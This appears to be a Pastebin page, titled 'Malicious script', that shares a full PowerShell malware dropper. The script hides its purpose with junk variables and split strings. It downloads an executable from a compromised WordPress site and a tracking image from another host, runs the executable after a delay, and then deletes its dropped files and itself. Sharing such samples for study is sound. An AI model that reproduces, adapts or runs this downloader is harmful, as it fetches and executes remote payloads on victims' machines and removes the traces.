Advertisement
dynamoo

Malicious script

Jul 8th, 2015
398
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. $ujdkwq = 'jqwdb';
  2. $stat = 'ht'+'tp://'+''+'savepic.su/5757956.jpg';
  3. $ggtt = 'http://bluemagicwarranty.com/wp-includes/theme-compat/getrichtoday.exe';
  4. $pths = 'C:\Users\PSPUBWS\AppData\Local\Temp\';
  5. $wehs = '26417';
  6. $nnm = '8';
  7. $ajsghdjas='absghjdasjgdas';
  8. $asdhjassad='2ygeqwgheqwgjhegqjwgqej sad';
  9. $down = New-Object System.Net.WebClient;
  10. $asdasdas='2geyu2ty1tyeu12g2eg e';
  11. $file = $pths+$nnm+'.exe';
  12. $statsfile = $pths+'444.jpg';
  13. $down.headers[''+'User-Agent'] = ''+'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25'+'';
  14. $dasdw='asdgjasd';
  15. $down.DownloadFile($ggtt,$file);
  16. $down.DownloadFile($stat,$statsfile);
  17. $asndjkashdas='hqugdhjgqw hj2gjh1gd hj12ghej1';
  18. $ScriptDir = $MyInvocation.ScriptName;
  19. $vbsFilePath = $pths+$wehs+'.'+'v'+'bs'+'';
  20. $statFilePath = 'c:\Users\MM\AppData\Local\Temp\444'+'.'+'jpg';
  21. $btFilePath = $pths+$wehs+'.'+'b'+'at';
  22. $psFilePath = $pths+$wehs+'.'+'ps'+'1';
  23. $asdhjqgwdq='qhwgdjqwghdjqw';
  24. $qwbhg21jd21h='jakshdjhagsdasd';
  25. Start-Sleep -s 13;
  26. cmd.exe /c  $file;    
  27. $file1 = gci $vbsFilePath -Force
  28. $nqjwdhgjqwd='qvdhqgwjdgwq';
  29. $file2 = gci $btFilePath -Force
  30. $file3 = gci $psFilePath -Force
  31. $kasldds = $vbsFilePath
  32. If (Test-Path $kasldds){ Remove-Item $kasldds }
  33. If (Test-Path $btFilePath){ Remove-Item $btFilePath }
  34. If (Test-Path $statFilePath){ Remove-Item $statFilePath }
  35. $asbdhjags = 'jahdjkhdjk21 21hjkhe jkhsakhd assd';
  36. If (Test-Path $file){ Remove-Item $file }
  37. Remove-Item $MyINvocation.InvocationName
Advertisement
Advertisement
Advertisement
RAW Paste Data Copied
Advertisement